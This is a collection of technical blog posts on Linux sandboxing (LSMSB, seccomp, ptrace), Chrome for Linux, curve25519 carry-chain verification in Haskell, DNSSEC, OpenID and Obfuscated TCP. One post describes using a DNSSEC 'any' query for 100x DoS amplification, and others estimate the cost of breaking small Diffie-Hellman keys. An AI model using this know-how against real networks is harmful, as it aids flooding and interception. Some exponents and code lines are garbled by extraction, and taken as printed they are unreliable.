(I don't wish to discount the good work that the SELinux folks have done: we'll probably use something like that sandbox on Fedora, but Chromium was very carefully written to be sandboxed and we should aim higher.)

So, as part of the exploration of what we could do with sandboxing on Linux, longer term, I have a prototype implementation of LSMSB. It's another literate program of mine, so you can usefully read the source too. The README is included below:

This is LSMSB, a sandboxing scheme for Linux based on the ideas of the OS X
sandbox (which, in turn, was inspired by TrustedBSD and FreeBSD).

Imagine that you're working on a university computer and you get a binary which
promises to do some fiendishly complex calculation, reading from a file ./input
and writing to a file ./output. It also talks to a specific server to access a
pre-computed lookup table. You want to run it, but you don't want to have to
trust that it won't do anything malicious (save giving the wrong answer).

This code is incomplete, but currently you can take a sandbox specification
like this:

filter dentry-open {
  constants {
    var etc-prefix bytestring = "/etc/";
  }

  ldc r2,etc-prefix;
  isprefixof r2,r2,r0;
  jc r2,#fail;
  ldi r0,1;
  ret r0;
#fail:
  ldi r0,0;
  ret r0;
}

... and use it to remove access to /etc.

*** This code functions, but is incomplete ***

It's written in a literate programming style, but the derived sources are
included so that you don't have to bother with that in order to build. You'll
need a recent (> 2.6.30-rc1) kernel in order to apply the included patch. Once
you've applied the patch, drop lsmsb.c into security/lsmsb and rebuild.

You can assemble a sandbox file with:
  ./lsmsb-as sandbox-input.sb > sandbox
And then run a shell in the sandbox with:
  ./lsmsb-install sandbox

To read the code, see http://www.imperialviolet.org/binary/lsmsb.html

Chrome for Linux

Myself and the rest of the Chrome Linux team have been working hard over the past few months to get Chrome ported to Linux. It's certainly very rough still, but it runs and the first development release just got released.

I'm very happy with this and we should be pushing new releases frequently from now on. If you're in the San Francisco office tomorrow, feel free to pop by the office as I'll be bringing in champagne.

Just to be clear, here are some of the things which don't work:

  • Plugins (so, no Flash)
  • Complex text (this is my TODO, I just got distracted)
  • Printing
  • Much of the options UI!

W2SP and Seccomp

I gave a talk today at W2SP about opportunistic encryption. You would have to ask someone in the audience how it went to get a real answer, but I feel it went OK.

The talk was based on a paper that I wrote for the conference.

Also, LWN covered some recent work that I've been doing at Google with Linux sandboxing.

Moved to GitHub

I've finally manged to move IV off heeps, a server which it's been ticking along on for the last half decade.

In the process, I've moved to GitHub using their Pages system. We'll see how well it works out!

In the process I've cleaned out a lot of stuff and probably broken lots of links. I trust that the search engines will figure it all out soon enough.

I'll be at CodeCon this y...

I'll be at CodeCon this year.

Thanks to Alexander Sotir...

Thanks to Alexander Sotirov to pushing me to check that the carry chains in donna-c64 were sufficient. I don't know if I realised something when I wrote it which I'm currently missing, or if I just screwed up, but I now believe that they're wrong.

I wrote this Haskell code to check it:

This Haskell code has been written to experiment with the carry chains in
curve25519-donna-c64. It's a literate Haskell program, one can load it into
GHCI and play along.

> module Main where
>
> import Data.Bits (shiftR, (.&.))

There are two constants that we'll need.

Our five limbs are, nominally, 51 bits wide, so this is the maximum value of
their initial values.

> twoFiftyOneMinusOne = (2 ^ 51- 1

2^128 - 1 is the limit of the range of our temporary variables. If we exceed
this at any point, our calculations will be incorrect.

> two128MinusOne = (2 ^ 128- 1

Now we define a type which mimics our 128-bit unsigned type in C. It's a
disjuction of an Integer and the distinguished value 'Overflow'. 'Overflow' is
contagious: if we try to perform any operations where one or both of the
operands is 'Overflow', then the result is also 'Overflow'.

> data U128 = U128 Integer
>           | Overflow
>           deriving (Show, Eq)

We make U128 an instance of Num so that we can perform arithmetic with it.

> instance Num U128 where
>   (U128 a) + (U128 b) = mayOverflow (a + b)
>   _ + _ = Overflow
>   (U128 a) * (U128 b) = mayOverflow (a * b)
>   _ * _ = Overflow
>   (U128 a) - (U128 b) = mayOverflow (a - b)
>   _ - _ = Overflow
>   negate _ = Overflow
>   abs a@(U128 _) = a
>   abs _ = Overflow
>   signum (U128 _) = 1
>   signum _ = 0
>   fromInteger = mayOverflow

> instance Ord U128 where
>   compare (U128 a) (U128 b) = compare a b
>   compare _ _ = EQ

This function lifts an Integer to a U128. If the value is out of range, the
result is 'Overflow'

> mayOverflow :: Integer -> U128
> mayOverflow x
>   | x > two128MinusOne = Overflow
>   | x < 0 = Overflow
>   | otherwise = U128 x

Our field elements consist of five limbs. In the C code, these limbs are
actually uint64_t's, but we keep them as U128's here. We will convince ourselves
that we don't hit any 64-bit overflows later.

> data FieldElement = FieldElement { m0 :: U128, m1 :: U128, m2 :: U128,
>                                    m3 :: U128, m4 :: U128 }
>                                  deriving (Show, Eq)

Now, two helper functions:

This function takes only the bottom 51-bits of a value

> clamp :: U128 -> U128
> clamp (U128 a) = U128 $ a .&. 0x7ffffffffffff
> clamp _ = Overflow

This function drop the bottom 51-bits of a value

> topBits :: U128 -> U128
> topBits (U128 a) = U128 $ a `shiftR` 51
> topBits _ = Overflow

This function simulates the 'fsquare' function in donna-c64, including its carry
chain. If the carry chain is sufficient, then iterating this function for any
valid initial value should never overflow.

> square :: FieldElement -> FieldElement
> square e = result where
>   t0 = m0 e * m0 e
>   t1 = m0 e * m1 e +
>        m1 e * m0 e
>   t2 = m0 e * m2 e +
>        m2 e * m0 e +
>        m1 e * m1 e
>   t3 = m0 e * m3 e +
>        m3 e * m0 e +
>        m1 e * m2 e +
>        m2 e * m1 e
>   t4 = m0 e * m4 e +
>        m4 e * m0 e +
>        m3 e * m1 e +
>        m1 e * m3 e +
>        m2 e * m2 e
>   t5 = m4 e * m1 e +
>        m1 e * m4 e +
>        m2 e * m3 e +
>        m3 e * m2 e
>   t6 = m4 e * m2 e +
>        m2 e * m4 e +
>        m3 e * m3 e
>   t7 = m3 e * m4 e +
>        m4 e * m3 e
>   t8 = m4 e * m4 e
>
>   t0' = t0 + t5 * 19
>   t1' = t1 + t6 * 19
>   t2' = t2 + t7 * 19
>   t3' = t3 + t8 * 19
>
>   t1'' = t1' + topBits t0'
>   t2'' = t2' + topBits t1''
>   t3'' = t3' + topBits t2''
>   t4' = t4 + topBits t3''
>   t0'' = t0' + 19 * topBits t4'
>   t1''' = clamp t1'' + topBits t0''

At this point, we implement two carry chains. If 'currentChain' is true, then we
implement the carry chain as currently written in donna-c64. Otherwise, we
perform an extra step and carry t1 into t2.

>   result = if currentChain
>               then FieldElement (clamp t0'') t1''' (clamp t2'') (clamp t3'')
>                                 (clamp t4')
>               else FieldElement (clamp t0'') (clamp t1''') t2''' (clamp t3'')
>                                 (clamp t4') where
>                    t2''' = clamp t2'' + topBits t1'''

This is the maximum initial element: an element where all limbs are 2^51 - 1.
Inspection of the 'fexpand' function should be sufficient to convince oneself of
this.

> maxInitialElement :: FieldElement
> maxInitialElement = FieldElement twoFiftyOneMinusOne twoFiftyOneMinusOne
>                                  twoFiftyOneMinusOne twoFiftyOneMinusOne
>                                  twoFiftyOneMinusOne

This function takes two field elements and returns the worst case result: one
where the maximum of each limb is chosen.

> elementWiseMax :: FieldElement -> FieldElement -> FieldElement
> elementWiseMax x y = FieldElement (f m0) (f m1) (f m2) (f m3) (f m4) where
>   f :: (FieldElement -> U128) -> U128
>   f accessor = max (accessor x) (accessor y)

We now define a series of values generated by squaring the previous element and
setting any limb that is less than the maximum to the maximum value.

> maxSeries = iterate (elementWiseMax maxInitialElement . square)
>                     maxInitialElement

This value controls which carry chain is used in 'square', the current one or
the one with the extra carry

> currentChain = True

By running this, we can see that the current carry chain is insufficient for
this simulation:

ghci> maxSeries !! 4
FieldElement {m0 = Overflow, m1 = Overflow, m2 = Overflow, m3 = Overflow,
              m4 = Overflow}

The series overflows after only four iterations. However, if we use the
alternative carry chain, the series is stable far beyound the requirements of
the Montgomery ladder used in donna-c64:

ghci> maxSeries !! 100000
FieldElement {m0 = U128 2251799813685247, m1 = U128 2251799813685247,
              m2 = U128 2251799813685247, m3 = U128 2251799813685247,
              m4 = U128 2251799813685247}

Additionally, these values are small enough not to overflow the 64-limb limbs.

When I wrote curve25519-d...

When I wrote curve25519-donna I implemented many of the critical functions in x86-64 assembly. It was a lot of code, even using the C preprocessor! This got a good 20% boost in speed. This was clearly very important because it made donna-x86-64 faster than djb's version .

However, djb just pointed out that the 64-bit C implementation of donna was now as fast as my hand coded version. Turns out that GCC 4.3 greatly improved the quality of the code generation for this sort of code and now equals my hand crafted efforts! Well done to the GCC team because the C code is vastly smaller and easier to understand. Thus, the x86-64 of donna has been removed from the repo.

Packet sizes in DNSSEC

Even when the DNS root hasn't started signing records, one can still use trust-anchors to employ DNSSEC for those TLDs which support it. Follow the links from Ben Laurie's latest blog post on the matter.

The .se ccTLD is one of those TLDs which support DNSSEC. You can test it with: dig +dnssec -t any se @a.ns.se. You'll see lots of NSEC, RRSIG and DNSKEY records. (DNSSEC is very complicated.)

However, the size of that reply is 3974 bytes long! All that from a request packet of 31 bytes. That's a very easy to use 100x DoS amplication. Of course, if you use mirror amplication like that, you cannot forge the source addresses of the flooding packets, making the flood easier to filter. However, DNSSEC may well bring DoS floods into the reach of many more attackers.

When Layers of Abstractio...

When Layers of Abstraction Don't Get Along: The Difficulty of Fixing Cache Side-Channel Vulnerabilities.

Why networked software should expire.

If your business is still writing letters in WordStar and printing them out on an original Apple Laserwriter, good for you. If you're writing your own LISP in vi on a PDP 10, best of luck. However, if you're still using IE6, that's just rude.

Networked software (by which I just mean programs that talk to other programs) on public networks have a different cost model than the first two examples, but our mental models haven't caught up with that fact yet. We're stuck with the idea that what software you run is your own business and that's preventing needed changes. Here's one example:

ECN (Explicit Congestion Notification) is a modification to TCP and IP which allows routers to indicate congestion by altering packets as they pass though. Early routers dropped packets only when their buffers overflowed and this was taken as an indication of congestion. It was soon noticed that a more probabilistic method of indicating congestion performed better. So routers starting using RED (random early drop) where, approximately, if a buffer is 50% full, a packet has a 50% chance of getting dropped. This gives an indication of congestion sooner and prevented cases where TCP timeouts for many different hosts would start to synchronise and resonate.

To indication congestion, RED drops a packet that has already traversed part of the network; throwing away information. So ECN was developed to indicate congestion without dropping the packets. Network simulations and small scale testing showed a small, but significant benefit from it.

But when ECN was enabled for vger.kernel.org, the mailing list server which handles Linux kernel mailing lists, many people suddenly noticed that their mails weren't getting though. It turned out that many buggy routers and firewalls simply dropped all packets which were using ECN. This was clearly against the specifications and, in terms of code, an easy fix.

ECN wasn't enabled by default in order to give time for the routers to get fixed. In a year or so, it was hoped, it could start to be used and the Internet could start to benefit.

That was over eight years ago now. ECN is still not enabled by default in any major OS. The latest numbers I've seen (which I collected) suggest that 0.5% of destinations will still stop working if you enable ECN and the number of hosts supporting ECN appears to be dropping.

The world has payed a price for not having ECN for the past eight years. Not a lot, but downloads have been a little slower and maybe more infrastructure has been build than was really needed. But who actually paid? Every user of the Internet did, a little bit. But that cost was imposed by router manufactures who didn't test their products and network operators who didn't install updates. Those people saved money by doing less and everyone else paid the price.

These problems are multiplying with the increasing amount of network middleware (routers, firewalls etc) getting deployed; often in homes and owned by people who don't know of care about them.

Recently, Linux 2.6.27 was released and broke Internet access for, probably, thousands of people. Ubuntu Intrepid released with it and had to disable TCP timestamps as a work around while the issue was fixed.

But the issue wasn't a bug in 2.6.27. It was a bug in many home routers (WiFi access points and the like) which was triggered by a perfectly innocent change in Linux that caused the order of TCP options to change. (I felt specifically aggrieved about this because I made that change.) The order was soon changed back and everything started working again.

But, for the future, this now means that the order cannot change. It's not written down anywhere, it's a rule written in bugs. This imposes costs on anyone who might write new TCP stacks in the future, by requiring increased testing and reduced sales as some customers find that it wont work with their routers. These are all costs created by router manufactures and paid by others.

Economists calls these sorts of costs externalities and they are seen as a failure which needs to be addressed. Often, in other areas, they are addressed by regulation or privitisation. Neither of those options appeal in this case.

An uncontroversial suggestion that I'm going to make is that we require better test suites. As a router manufacturer, testing involves checking that your equipment works with a couple of flavors of Windows and, if we're lucky, Linux and some BSDs too. This is much too small of a testing surface. There needs to be an open source test suite designed to test every corner of the RFCs. The NFS connectathons are similar in spirit and probably saved millions of man-hours of debugging over their lifetimes. Likewise, the ACID tests for web browsers focused attention on areas where they were poorly implementing the standards.

And, although my two examples above are both IP/TCP related, I don't want to suggest that the problem stops there. Every common RFC should have such a test suite. HTTP may be a simple protocol but I'll bet that most implementations can't cope with continued header lines. It's those corners which a test suite should address.

Testing should help, but I don't think that it'll be enough. Problems will slip through. Testing against specifications will also never catch problems with the specification itself.

DNS requests can carry multiple questions. There's a big counter in the packet to say how many questions you are asking. However, the reply format can only hold one response code. Thus, I don't know of any DNS server which handles multiple questions (most consider the request to be invalid).

The ability to ask multiple questions would be very helpful. Just look at the number of places which suggest that you turn off IPv6 to make your networking faster. That's because software will otherwise ask a single IPv6 question of DNS, wait for the reply and then ask the IPv4 question. This delay, caused by not being able to request both results in a single request, is causing people to report slowdowns and disable IPv6.

We need to fix DNS, but we never can because one cannot afford break the world. We can't even start a backwards compatible transition because of broken implementations.

That's why networked software should have an expiry date. After the expiry date, the code should make it very clear that it's time to upgrade. For a router, print a big banner when an administrator connects. Flash all the error lights. For software, pop up a dialog every time you start. For home routers, beep and flash a big indicator.

We don't need everyone to update and, as manufacturers fold, maybe there won't be any firmware updates or software upgrades. Almost certainly the device shouldn't stop working. But we need to make more of an effort to recognise that large populations of old code hold everyone else back.

If we can know that nearly all the old code is going to be gone by some date, maybe we can make progress.

(Thanks to Evan for first putting this idea in my mind.)

rwb0fuz1024 included in eBATS

rwb0fuz1024 (pronounced 'robo-fuzz') has been included in the eBATS benchmarking suite. Not all of the test systems have been run with it yet, but here's one which has. It's the fastest verification by fa r .

(Full results here)

Sandboxing on Linux

This blog post has been brought about because of the issues of sandboxing Chromium on Linux (no, it's not ready and wont be for months).

Chromium uses a multiprocess model where each tab (roughly) is a separate process which performs IPCs to a UI process. This means that we can do parallel rendering and withstand crashes in the renderer. It also means that we should be able to sandbox the renderers.

Since the renderer are parsing HTML, CSS, Javascript, running plugins etc, sandboxing them would be very desirable. There's a lot of scope for buffer overflows and other issues in a code base that large and a good sandbox would dramatically reduce the scope of any exploits.

Traditional sandboxes: chroot, resource limits

People have been using chroot jails for many years. A chroot call changes the root of the filesystem for the current process. Once that has happened the process cannot interact with any of the filesystem outside the jail. As long as the process cannot gain root access, it's a good security measure.

Resource limits prevent denial of service attacks by, say, trying to use up all the memory on the system. See the getrlimit manpage for details.

These two mechanisms are supported by most UNIX like systems. However, there are some limitations:

Network access, for one, is not mediated by the filesystem on these platforms, so a compromised process could spew spam or launch attacks on an internal network. Also, the chroot call requires root access. Traditionally this has been done with a small SUID helper binary, but then root access is needed to install etc.

ptrace jails

The ptrace call is used by the strace utility which shows a trace of all the system calls that a child makes. It can also be used to mediate those system calls.

It works like this: the untrusted child is traced by a trusted parent and the kernel arranges that all system calls that the child makes cause a SIGTRAP, stopping the child. The parent can then read the registers and memory of the child and decide if the system call is allowed, permitting it or simulating an error if not.

The first issue is that some system calls take pointers to userspace memory which needs to be validated. Take open, which passes a pointer to the filename to be opened. If the parent wishes to validate the filename it has to read the child's memory and check that it's within limits. That's perfectly doable with ptrace.

The issue comes when there are multiple threads in the untrusted address space. In between the parent validating the filename and the kernel reading it, another thread can change its contents. In the case of open that means that the validator in the parent see one (safe) filename but the kernel actually acts on another. Because of this, either multithreaded children need to be prohibited, or the validator must forbid all system calls which take a pointer to a buffer which needs to be validated.

When calls like open have been prohibited, there's another trick which can be used to securely replace it:

UNIX domain sockets are able to transmit file descriptors between processes. Not just the integer value, but a reference to the actual descriptor (which will almost certainly have a different integer value in the other process). For details see the unix and cmsg manpages.

With this ability an untrusted child can securely open a file by making a request, over a UNIX domain socket to a trusted broker. The broker can validate the filename requested in safety: because it's in another address space the filename is safe between validation and use by the kernel. The broker can then return the file descriptor over the socket to the untrusted child.

The major problem with ptrace jails is that they have a high cost at every system call. On my 2.33GHz Core2 a simple getpid call takes 128ns. When a process is ptraced, that rises to 13,800ns (a factor of 100x slower). Additionally, Chromium on Linux is a 32-bit process because of our JIT, so getting the current time is a system call too.

Seccomp

Seccomp has a rather messy past (see the linked Wikipedia page for details). It's a Linux specific mode which a process can request whereby only read, write, exit and sigreturn system calls are allowed. Making any system call not on the permitted list results in immediate termination of the process.

This is a very tight jail, designed for pure computation and is perfect for that. It's enabled by default in kernel builds (although some distributions disable it I believe). It used to be enabled via a file in /proc but, in order to save space, it's now a prctl.

This issue is that the jail is too tight. It's great that read and write calls are enabled without overhead because that's much of what one of our rendering processes will use, but many other system calls would be nice (brk and mmap for memory allocation, gettimeofday etc). We would have to use the broker model for all of them.

For some calls the broker model has to be updated. Allocating memory to an address space isn't something which can be performed outside that address space so, in this case, the broker for these calls has to be in the same address space. This means that there's an untrusted thread running under seccomp and a trusted thread, not running seccomped, in the same process. The untrusted thread can request more memory by making an request over a pipe to the trusted thread. The trusted thread can then perform the allocation in the same address space.

This presents some issues when writing the trusted code. Because untrusted code has access to the memory the only thing the trusted thread can trust are its registers. That means no stack nor heap usage. Basically the trusted code has to be written in assembly and has to be pretty simple. That's not a huge problem for us however.

But we will be making lots of these other system calls, not just the memory allocation ones, but time calls, poll etc. All have to use a broker model.

To recap, a basic system call (getpid) on my 2.33GHz Core2 takes about 128ns. Performing the same operation over a pipe to another thread takes 7,775ns and to another process takes 8,423ns, roughly a factor of 60x slower.

Again, this is a very painful slowdown given the volume of such calls that we expect to make.

SELinux

Fedora, rightfully, makes a lot of noise about the fact that they have SELinux. It's a huge beast and Fedora's work has mostly been a process of taming the complexity and dealing with the fact that very little is written with SELinux in mind.

I don't have Fedora installed anywhere, but this may be a very nice solution to our issues. However, I suspect that root access will be required, again, to configure it. I speak mostly from a position of ignorance here, however. I should install Fedora at some point and have a play.

The Other Man's Grass

Recent releases of OSX have a system call actually called sandbox_init. It's a little half-baked at the moment, but shows great promise.

It's a feature from TrustedBSD and, in the limit, allows for a Scheme like language to give a detailed specification of the shape of the sandbox which is compiled to bytecode and loaded into the kernel. You can see some examples of the profile language in the slides for this USENIX talk. But, for the moment, I believe that just a few preset profiles are provided (see the manpage).

Rolling one's own

SELinux is implemented atop of LSM which is a general framework for hooking security decisions in the Linux kernel. It's conceivable that one could write a sandboxing module using these hooks.

It would require root access to install, but then so do many of the other solutions. It would probably play badly with other LSM users too, but Fedora is the only major distribution to be using them as far as I know. However, it would also be a large distraction.

Summary of data
PlatformSimple system call... via a broker thread... via a broker process... when ptraced
32-bit 136.9ns 8161.4ns 8327.3ns 14087.0ns
64-bit 128.7ns 7775.0ns 8423.3ns 13779.9ns

Obfuscated TCP

It's now in its 3rd iteration, Obfuscated TCP now has an updated site, mostly working code etc. I need people to go to the site, look at the docs, watch the video, build the code, try stuff out etc. Tell me what works and what doesn't. Email address is at the top of the page. Thanks to all who do, and remember that you don't just have to email if you have problems, positive reports are good too!

Google datacenters

There are different levels of secrets at Google. Almost everything unreleased is “confidential” - which means that we don't talk about it to the outside world. Then there is the “top secret” stuff - stuff that you don't even talk about to other Googlers.

Now, top secret stuff is rare because it's a little poisonous. An environment where lots of things are secret between coworkers isn't a pleasant one. How we cool our data centers was one of those items and I was sworn to secrecy when I was lucky enough to be given a guided tour of our Oregon operations.

But, for whatever reasons, this information is now public! Seriously, this is some of the coolest (no pun intended) stuff that Google does: go read about evaporative cooling.

A Rabin-Williams signature scheme: rwb0fuz1024

I wrote a Rabin-Williams signature scheme [source]:

  • Verification speeds 4x RSA (on a Core2 2.33GHz, at least)
  • Signatures are half the size of RSA for the same security
  • A hash generic attach is provably as hard as factoring

Crit-bit trees

I wrote up djb's implementation of crit-bit trees for strings here [pdf]. Crit-bit trees have several nice properties:

  • Fast: only a single string compare per lookup.
  • For finite sets (like 32-bit ints) the depth of the tree is bounded by the length of the longest element.
  • Simple code - no complex balancing operations
  • Supports the usual tree operations: successor, minimum, prefix set etc.

Several groups of Linux k...

Several groups of Linux kernel papers have been published recently. Here's my pick of them:

First we have the Proceedings of the 2008 Linux Symposium (these are in some order of order, favourite first):

Next there's the ACM SIGOPS Operating Systems Review. These papers are about much more experimental developments in the kernel and are thus more fun, even if they are less likely to see the light of day:

I've just releasedtwo new...

I've just released two new curve25519 implementations: one in C and one in x86-64 assembly. The latter is 10% faster than djb's implementation.

curve25519 is an elliptic curve, developed by Dan Bernstein, for fast Diffie-Hellman key agreement. DJB's original implementation was written in a language of his own devising called qhasm. The original qhasm source isn't available, only the x86 32-bit assembly output.

Since many x86 systems are now 64-bit, and portability is important, this project provides alternative implementations for other platforms.

Implementation Platform Author 32-bit speed 64-bit speed
curve25519 x86 32-bit djb 265µs N/A
curve25519-donna-x86-64 x86 64-bit agl N/A 240µs
curve25591-donna Portable C agl 2179µs 628µs

(All tests run on a 2.33GHz Intel Core2)

Google has, at last, open...

Google has, at last, open sourced Protocol buffers. My, very minor contribution to this is that I wrote the basis for the encoding documentation.

Protocol buffers pretty much hit the sweet spot of complexity and capability. (See XML and ASN.1 for examples of attempts which missed.) I have the beginnings of a protocol buffer compiler for Haskell that I wrote for internal apps. Now that the C/Java/Python versions are out, I should probably clean that up and put it on Hackage. But every coder should consider protocol buffers for their serialisation needs from now on.

The Black Swan

Firstly, if you're wondering what happened to all the ObsTCP stuff, it didn't disappear, it just moved to a different blog. Things are still moving as fast as I can push them.

(ISBN: 1400063515)

This book has some good, if unoriginal, points about the stupidity of much of the modeling done in today's world, esp the world of finance. Sadly, these are hidden in many pages of self-centered rambling and discourse on adventitious topics. If you're thinking of buying this book, get The (Mis)behaviour of Markets by Mandelbrot instead; you'll thank me.

I've added a bunch of Obs...

I've added a bunch of Obsfucated TCP stuff to the obstcp project page code.google.com include kernel patches, userland tools, specs and friendly introductions.

Also, I posted it to Reddit. If it doesn't get downvoted into /dev/null in 60 seconds, the comments will probably end up there.

OpenID - not actually spawn of Satan

A blog post aggregating complaints about OpenID has been popping up in different places this morning. If you've read it, you might want a little perspective. I'm not going to deal with each point in turn because there's so many, mostly repeating each other.

Phishing

At login time, the site that you're logging into can end up redirecting you to your OpenID provider. Your provider then tells you to go to their site and enter your login information, then click a button to try again. They don't provide a "link" to their site and they don't ask for your password.

Some early providers might not have followed these basic steps, but all the reasonable ones do.

Yes, it's still possible for users to be confused but, by habit they'll be used to doing to right thing.

XSS and CSRF

XSS problems on the providers site are a big deal. This criticism is reasonable.

CSRF may be a bigger deal because you are more likely to be 'logged in' to the target. However, most users already keep persistent cookies to save logging into these sites. The additional attack surface here is dubious; CSRF issues are a problem with or without OpenID.

DNS poisoning

If your OpenID starts with https://, you should be protected from DNS poisoning attacks and the like by the usual TLS PKI. This isn't perfect, but it's pretty good.

However, the OpenID spec says that plain domain names are normalised by prepending http://. This is a technical problem with the spec and should be fixed. Until then, this is a reasonable criticism but not a fundamental issue.

Privacy

The OpenID provider has a lot of information about your activities. This is little different than, say, your email account and many people are happy with Gmail. Likewise, password recovery on most of the sites which could use OpenID is based on email access, so most people already have a single password that suffices for entry to many sites.

If you don't like the idea of Gmail you can run your own email server. Likewise, you can run your own OpenID provider.

Using the same OpenID on many sites does allow them to link your activities. So does giving these sites your email address for password recovery. So does using the same IP (although to a lesser extent).

Some providers will let you have many OpenIDs linked to the same account for this reason. Joe user probably won't use that feature and probably gives the same email address to all those sites already and so looses nothing.

Trust problems

OpenID is not a trust system. Trust systems may be built on top of identity systems. Likewise, apples are not oranges and complaints about their lack of tangyness are moot.

Usability / Adoption

Somewhat valid points here. It's a big job to get widespread adoption and, at the moment, it's a pretty small crowd that uses OpenID. However, OpenID doesn't need a flag day; it can have incremental deployment.

Availability

Valid points. If your provider goes down you're going to have a bad day.

Conclusion

I don't believe that OpenID should be used to login to your bank account. However, for the myriad of sites that I login to (Google Reader, reddit, ...) it would be nice to just be able to type my OpenID in. It's decently suited to that because I'm fed up with all these accounts.

I'm now running a Ubuntu ...

I'm now running a Ubuntu based laptop with a somewhat functions Obsfucated TCP patch in its kernel. (If you have a Neo like view of the Internets you'll be able to see it by the funny options in the SYN packets.)

Hopefully soon I'll be able to post a first draft patch for other people to try. In the mean time, I wrote the start of the mounds of documentation I suspect it'll need: a very non-technical introduction.

I've updated the patches ...

I've updated the patches linked to in the last post with today's work. Both sides now end up with the same shared key (and not just because they got the same private key from lack of entropy like before). That took some fun tracking down of bugs.

Also, packets are now HMAC-MD5'ed with the shared key, and invalid packets are dropped. That also took far longer than expected. I ended up using the MD5 implementation from the CIFS filesystem because the kernel's crypto library is just plain terrible. It's also totally undocumented but, from what I can see, you can't lookup an algorithm without taking a semaphore, and that requires that you be able to sleep. I almost think I must be missing something because that's dumber than the bastard offspring of Randy Hickey and Jade Goodie.

But there we go. Encryption (with Salsa20) to come next Wednesday.

First Obsfucated TCP patches

After a day of kernel hacking, I have a few patches which, together, make a start towards implementing ObsTCP.

At the moment, it will advertise ObsTCP on all connections and, if you have two kernels which support it, you'll get a shared key setup. At the moment, the private key is generated at boot time and since the host doesn't have any entropy then, it's always the same. So I'll have to do something special there. Also, I've a problem where the ACK with the connecting host's public key can get lost. Since ACKs aren't ACKed, this can be a real pain. I think I need to include it in every transmitted packet until (yet another) option signifies that it's been received.

After the last post expla...

After the last post explained why small curves aren't good enough for obsfucated TCP, I decided that, since I'm going to have to do some damage to the TCP header to get a bigger public key in there anyway, I might as well go the whole way and use curve25519, by djb. Now, djb has forgotton more about elliptic curves than I'll ever know and I feel much happier using a curve that's been designed by him. As you can probably guess from the name, it's a curve over 2255-19 - a prime. So the public keys are 32 bytes long.

In order to get that much public key material into a TCP header, here's my proposed hack: Jumbo TCP options.

djb's sample implementation of curve25519 is written in a special assembly language called qhasm. Sadly, it's so alpha that he's not actually released it. So the sample implementation is for ia32 only, uses the floating point registers and has 5100 lines of uncommented assembly. It is, however, freaking quick.

However, since I have kernel-space in mind for this I've written a C implementation. It's about 1/3 the speed (and I've not really tried to optimise it yet), doesn't use any floating point (since kernel-space doesn't have easy access to the fp registers in Linux) and fuzz testing seems to indicate that it's correct. (At least, it's giving the same answers as djb's code.)

Next step: hacking up the kernel. (And I thought the elliptic curve maths was hard enough.)

Elliptic curves don't work either

(For context, see my previous post on OTCP)

In any Diffie-Hellman exchange based on elliptic curves, we have Q=aP where P and Q are points on an elliptic curve. The operation of multiplying a point and a scalar is well defined, but unimportant here. The problem facing the attacker is, given Q and P, find a. If they can do that, we're sunk.

If you could find a pair of numbers such that: cP + dQ = eP + fQ then you're done because: (c-e)P = (f-d)Q = (f-d)aP, then a = (c-e)/(f-d) mod n, where n is the size of the field underlying the curve.

Finding such a point by picking random examples is never going to work because of the storage requirements. However, if you define a step function which takes a pair (c, d) and produces a new pair (c', d') you have defined a cycle through the search space. (It must be a cycle because the search space is finite. At some point you must hit a previous state and loop forever.) Now you can use Floyd's cycle finding algorithm to find a collision with constant space. This is an √n algorithm for breaking this problem and is well known as Pollard's rho method.

Now, if you have many of these problems you get a big speed up by using some storage. Assume that you do the legwork to solve an instance of the problem and that you record some fraction of the points that you evaluated. (How you choose the points isn't important so long as it's a function of the point; say pick all points where the first m bits are zero.)

Now, future attempts to break the problem can collide with one of the previous points. If you find cP + dQ = eP + fR (note that P is a constant of the elliptic curve system) and also that R = bP (because we solved this instance previously) then cP + dQ = cP + adP = (e+fb)P and so (c-(e+fb)) / d = a (and we know all the values on the left-hand side).

Now, 2112 (14 bytes) is about as big an elliptic curve point as we can fit in a TCP header. The maximum options payload is 40 bytes, of which 20 are already taken up in modern TCP stacks. We need 2 bytes of fluff per option and, unless we want this to be the last TCP header ever, we need to leave at least 4 bytes. That's where the 14 byte limit comes from.

We give the attacker 250 bytes of space. I believe that each point will take 3*14 bytes of space for the (c,d,Y) triple, where Y = cP+dQ. Thus they can store 244 distinguished points. Thus one in 256-44=12 points are distinguished. Additionally, generating those 244 points isn't that hard, computationally. This suggests that an attacker can find a collision in only 212 iterations., or about 213 field multiplications.

So, again, a reasonable attacker can break our crypto in real time.

This scheme becomes much harder to sell if we have to do evil things to the TCP header in order to make it work.

If you've been wondering ...

If you've been wondering what I'm up to at work, we now have a public blog for the RechargeIt project.

How sad: from reading the...

How sad: from reading the sleepcat documentation on network partitions, it's clear that BDB uses a broken replication system (i.e. not Paxos). That's a shame because I was hoping to use it.

Yahoo now has OpenID for ...

Yahoo now has OpenID for all its accounts, which is great. Wonderful in fact. OpenID is a good thing for many authentication needs on the Internet and will make the world a better place.

However,...

  • SHA256 isn't supported, only SHA1. It's true that the standard doesn't require it, but this still gets you lots of crapness points.
  • The return_to is filtered. Probably someone here had good intentions, but I can redirect a browser to any URL, so filtering the return_to is pointless and overly restrictive. Specifically, it appears that:
    • You can't have a port number in the host
    • You can't have an IP address for a host
    • You can't have a single element hostname (like localhost)
    • So, more crapness points for Yahoo.

    How good is a 64-bit DH exchange?

    In my last post, I suggested that a register based modexp for 64-bit numbers could run at about 500K ops/sec. Well, I wrote one and got 450K ops/sec on an older Core2. (That's with gcc -O3, but no tuning of the code. Plus, I don't know the standard algorithm for 128-bit modulus using 64-bit operations, so I wrote my own, which is almost certainly suboptimal.). Roughly that's 220 ops/s, so a brute force solution of 64-bits would take about 242 seconds, which is more than enough for us.

    However, there are much better solutions to the discrete log problem than that. Here I'm only dealing with groups of prime order. There are very good solutions for groups of order 2n, but DH uses prime order groups only.

    The best information I found on this are a set of slides by djb. However, they are a little sparse (since they are slides after all). Quick summary:

    • Brute force parallelises perfectly. An FPGA chip could do 230 modexps per second. An array of really good ones could push that upwards of 240 modexps/sec.
    • Breaking n Diffie-Hellmans isn't much harder than breaking one of them when using brute force. Since you can look for collisions against all n public keys at once. If you were a sniffer trying to sniff hundreds of connections per second, that's actually a big advantage. That could give up an amortised benefit equal to 210 or more.
    • You can use "random self reduction" to "split" a problem into many problems and solving any of them they breaks the original problem. Combine this with the previous point and you can speed up the breaking of a single problem.
    • If you figure out the optimal number of subproblems to "split" the original problem into you have the "giant step, baby step" algorithm which takes only about 2√n modexps to break (where n is 64 in our case).
    • Now things are getting complex, so I'm just going to include the results: Pollard's rho method lets us break 64-bits in 232 modexps.
